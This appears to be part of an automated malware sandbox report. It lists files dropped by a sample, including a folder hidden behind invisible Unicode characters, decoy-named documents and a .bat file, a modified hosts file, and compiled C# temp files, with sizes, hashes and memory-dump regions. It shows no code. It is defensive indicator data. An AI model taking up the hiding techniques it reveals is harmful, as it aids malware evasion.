C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Desktop\SendWait.jpg

Filesize
200KB

MD5
01825478c8ecc10ee26a7e080a8eb944

SHA1
221ccfa917246eb3e5028d2cb6a44a182e251711

SHA256
eff1aed8f6402ee4263e69861fa5ec15007936048b906892eb7854c66372ed9a

SHA512
eb0f55f10fd8f9cf422b4f2279955676f72b52886e9a1883ae99ee3648a80d38a4ca8c1e31bc8594fcf6d767b70440e9143ab772d439b3dcdfdd823e72516b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Documents\ConvertConvertFrom.docx

Filesize
17KB

MD5
e20db8a139b01192f677a1cb0b1a79cd

SHA1
450e213f2b5609596b6fbbcfa085d5d0f6e388f2

SHA256
cc5ff7ff07f1d832ca5a276261d403c817a293ce37ed442afb3d760be42c77c0

SHA512
c3fd37256ed39ba362f0f8f24a14dd308d160f81e9015da4cfcb3490095202b09d6723a3a0b5192b249e3d085d6dd555eeed2908553034b28ad683a7b336d82e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Documents\JoinRead.xls

Filesize
384KB

MD5
8cdfec5691e9876b69909064df25f602

SHA1
51953b7bd04aa5c42167a6077b37460a9bd0fcd2

SHA256
5bb46f1b5117a9bb1c04aae9379821c7b8e633c08b195c159ecd6495fd17c140

SHA512
2bf3334c8cbf908bc96ba2b2dca530dbb159b8276cc86b2e14d7605b75f55d5a517a7db1a1e86c09b55776a94207acdd6506d0afa9e5d44594dbcb026f23bae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Documents\OutSubmit.xlsx

Filesize
11KB

MD5
f2907f49811d989ea75beb439c45f260

SHA1
e6936201edf963b3a97fc0043faae362d85bf2d9

SHA256
498c512ca65c8ae414c546150ef6e1cc8c3015f67bf6276c2f30bc0858bbf67c

SHA512
1d54e7e1206ee420449f9d32f7a86e06b5d5e216d09a78156acc0c494f6e65788e13602ffd2766d620448288ad682743eabf22105f6747a52dc4e0af2fc07a6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Documents\SubmitConvert.xlsx

Filesize
13KB

MD5
e1d1a7f7ec14ed88149be1a3f45f34f4

SHA1
f7dfa81a34fd4603dda781b05b3214f42de653a6

SHA256
122aca0548f24c65e7e2b6366a7859c441959f46c0e18fdc23095f228e774be9

SHA512
c382e953d38911b51490d0ea695c417a01a150bb1d6b3ed51912ef230db44101570c9525afb8cea06aa49283ead6a609c45446096b62c3daf819f07fd1f34314

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Downloads\CompressHide.mp4

Filesize
436KB

MD5
5916f238ef4138d66e87facc37926e4a

SHA1
fa36828b59d42557f806036bebed16dd568ed941

SHA256
3d0a929ef64549fccdfe679b8f34e5c7245298b60c532f9f57df1542baf72fc7

SHA512
69d2980b7b365e41ade8a097269fb8d2943061d7b2d0a5ae31401cef6d13a6cca378de1b86f682516eba94c171ec57eef8995a921015c1500b556a0c782bd5d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Downloads\CopyExport.jpg

Filesize
748KB

MD5
1e5903c7facb615506336f73f20f48bf

SHA1
317db42441f348062a22c3a116e77566a023bd36

SHA256
38031c82283a0d8a70951f813710b609c970ba21ff83c47d2a120bb160eb96c4

SHA512
3ec91d4fafed79e02d99237502f5353d66005b03e3733a17a6cbb85d661de0076810ac7c96a9249baa3e7a5451a8fa337f0755cdc71dd5ab44abb1ef3802d8ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Downloads\RemoveSave.docx

Filesize
715KB

MD5
71dd42d12e2a52a04cf7afa99d954995

SHA1
8d0838910ad0f4757e73a1950164e77be9aca02f

SHA256
e644543ae096866c6a84311e75927929ef09e70c2b1e5965cdeb9312bbd73254

SHA512
74536861aefc032591a19f5c23d821638fd155983d8ea973b86589754335d95615561d7f424c2551e150af5d510362923a0e469d6fa85d3bc37a7ac3baf463cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Downloads\SaveDebug.docx

Filesize
304KB

MD5
273d61a390f4644a3a224ee1e709347d

SHA1
f13382b854baecf6e193feb6c7adf89a011c4870

SHA256
33b82cf143ccf4d78ef658311ba0c11c62ae0f4dac214cbf298d8ec6e73f572b

SHA512
a478e3e2093f51ad8ea33067d31b98d78501811adb00ba0c4a9153d7bf1b8c65f41935688a80558e594f2ba37e5a5c26276dd167ebb4e8bb518c3678bb5d2547

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Downloads\UnregisterStop.jpeg

Filesize
863KB

MD5
17e1a4361d7bf46c8cbc8ae12c4912b6

SHA1
d20c9d7123235a75bed6f4646ea780add20275c2

SHA256
3fc2723b035acd0ae059e4c8bf0abeb1d6ed095cfbae5a7add4494590604755a

SHA512
8cb46ce52c7b77aaa7fc7b0d84f7da22f1dc267376e5d865afe83f93c5008cd3e584041bd24fffeebcee3bec7a89489661e519524056822ed0dc042d28cd06f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ ‍ \Common Files\Music\BackupGroup.bat

Filesize
992KB

MD5
4ef12eaabdf41225dcf24170a9bba478

SHA1
0c9f48b1b4e73826dbe0f381fd2c6106589dad93

SHA256
24904a9039bd1498c9b820f8b238a6f04bf51b5a1259a2387ffc9dcb38245743

SHA512
72e444e6eb08d0ecc465d3980df4355e8203ba91423b82a701ef15154bb3343f0c5da6fff2dec92057f2f1f6519e125c1b7c83352c615ae03ec75c472c81400d

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5byjuk5z\5byjuk5z.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5byjuk5z\5byjuk5z.cmdline

Filesize
607B

MD5
012f343a5138ff19bf1ccd4c2f65c732

SHA1
1110629ff75e2dd3e528af964462bc6c6e3a91db

SHA256
88ee0ff27c2b6eead5eec73cff6d65c38d2a1f136f959d6eec558a987e7648fe

SHA512
c2499c5249696f677ca3e1e14c78539733cb9a8a4f4971afeb45f7c0ecafe6149ce2b78deceb903183d19d72fcf48cbdd5c04654da9b31b63ac89c15cdf3d233

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5byjuk5z\CSC6ABF007768244476B89D53753AD2BCB.TMP

Filesize
652B

MD5
c63232aea1eeb5bbf9996b69fc448b7a

SHA1
fb987dc72991d4ed2e7a6c5d09acfa688899d0ed

SHA256
c9fc4e0247d1389b4c682846cd6ac13300344cb6e0edd01d51873894c1fa10a8

SHA512
8aea6aebb25488e3cbc3b3f2fdacaeb716f0055645f18f2c6bec70854a948df1bda78ed1153101d8bfb1b9096524152905f1ffa8cd62863a262322ce034e990c

Download Submit
memory/1536-208-0x000002056ABC0000-0x000002056ABC8000-memory.dmp

Filesize
32KB

Download
memory/2072-93-0x0000021229480000-0x00000212294A2000-memory.dmp

Filesize
136KB

Download
memory/3024-324-0x000002282D720000-0x000002282D93C000-memory.dmp

Filesize
2.1MB

Download
memory/4760-25-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp

Filesize
6.8MB

Download
memory/4760-78-0x00007FFBBC7C0000-0x00007FFBBC7CD000-memory.dmp

Filesize
52KB

Download
memory/4760-76-0x00007FFBB9120000-0x00007FFBB9134000-memory.dmp

Filesize
80KB

Download
memory/4760-321-0x00007FFBB8B30000-0x00007FFBB8BFD000-memory.dmp

Filesize
820KB

Download
memory/4760-72-0x00007FFBB8B30000-0x00007FFBB8BFD000-memory.dmp

Filesize
820KB

Download
memory/4760-219-0x00007FFBB8600000-0x00007FFBB877F000-memory.dmp

Filesize
1.5MB

Download
memory/4760-73-0x0000011E10290000-0x0000011E107B9000-memory.dmp

Filesize
5.2MB

Download
memory/4760-68-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp

Filesize
6.8MB

Download
memory/4760-71-0x00007FFBA8700000-0x00007FFBA8C29000-memory.dmp

Filesize
5.2MB

Download
memory/4760-69-0x00007FFBB9140000-0x00007FFBB9173000-memory.dmp

Filesize
204KB

Download
memory/4760-64-0x00007FFBBDBD0000-0x00007FFBBDBDD000-memory.dmp

Filesize
52KB

Download
memory/4760-62-0x00007FFBB9180000-0x00007FFBB9199000-memory.dmp

Filesize
100KB

Download
memory/4760-60-0x00007FFBB8600000-0x00007FFBB877F000-memory.dmp

Filesize
1.5MB

Download
memory/4760-58-0x00007FFBB91A0000-0x00007FFBB91C4000-memory.dmp

Filesize
144KB

Download
memory/4760-56-0x00007FFBB91D0000-0x00007FFBB91EA000-memory.dmp

Filesize
104KB

Download
memory/4760-322-0x0000011E10290000-0x0000011E107B9000-memory.dmp

Filesize
5.2MB

Download
memory/4760-47-0x00007FFBBC700000-0x00007FFBBC725000-memory.dmp

Filesize
148KB

Download
memory/4760-48-0x00007FFBBDBE0000-0x00007FFBBDBEF000-memory.dmp

Filesize
60KB

Download
memory/4760-298-0x00007FFBA8700000-0x00007FFBA8C29000-memory.dmp

Filesize
5.2MB

Download
memory/4760-188-0x00007FFBB91A0000-0x00007FFBB91C4000-memory.dmp

Filesize
144KB

Download
memory/4760-446-0x00007FFBBC700000-0x00007FFBBC725000-memory.dmp

Filesize
148KB

Download
memory/4760-75-0x00007FFBBC700000-0x00007FFBBC725000-memory.dmp

Filesize
148KB

Download
memory/4760-54-0x00007FFBB98A0000-0x00007FFBB98CD000-memory.dmp

Filesize
180KB

Download
memory/4760-83-0x00007FFBB8360000-0x00007FFBB847B000-memory.dmp

Filesize
1.1MB

Download
memory/4760-326-0x00007FFBBC700000-0x00007FFBBC725000-memory.dmp

Filesize
148KB

Download
memory/4760-325-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp

Filesize
6.8MB

Download
memory/4760-331-0x00007FFBB8600000-0x00007FFBB877F000-memory.dmp

Filesize
1.5MB

Download
memory/4760-340-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp

Filesize
6.8MB

Download
memory/4760-454-0x00007FFBB9140000-0x00007FFBB9173000-memory.dmp

Filesize
204KB

Download
memory/4760-459-0x00007FFBB8360000-0x00007FFBB847B000-memory.dmp

Filesize
1.1MB

Download
memory/4760-458-0x00007FFBBC7C0000-0x00007FFBBC7CD000-memory.dmp

Filesize
52KB

Download
memory/4760-457-0x00007FFBB9120000-0x00007FFBB9134000-memory.dmp

Filesize
80KB

Download
memory/4760-456-0x00007FFBA8700000-0x00007FFBA8C29000-memory.dmp

Filesize
5.2MB

Download
memory/4760-455-0x00007FFBA8E80000-0x00007FFBA9544000-memory.dmp

Filesize
6.8MB

Download
memory/4760-453-0x00007FFBBDBD0000-0x00007FFBBDBDD000-memory.dmp

Filesize
52KB

Download
memory/4760-452-0x00007FFBB9180000-0x00007FFBB9199000-memory.dmp

Filesize
100KB

Download
memory/4760-451-0x00007FFBB8600000-0x00007FFBB877F000-memory.dmp

Filesize
1.5MB

Download
memory/4760-450-0x00007FFBB91A0000-0x00007FFBB91C4000-memory.dmp

Filesize
144KB

Download
memory/4760-449-0x00007FFBB91D0000-0x00007FFBB91EA000-memory.dmp

Filesize
104KB

Download
memory/4760-448-0x00007FFBB98A0000-0x00007FFBB98CD000-memory.dmp

Filesize
180KB

Download
memory/4760-447-0x00007FFBB8B30000-0x00007FFBB8BFD000-memory.dmp

Filesize
820KB

Download
memory/4760-301-0x00007FFBB9140000-0x00007FFBB9173000-memory.dmp

Filesize
204KB

Download
memory/4760-445-0x00007FFBBDBE0000-0x00007FFBBDBEF000-memory.dmp

Filesize
60KB

Download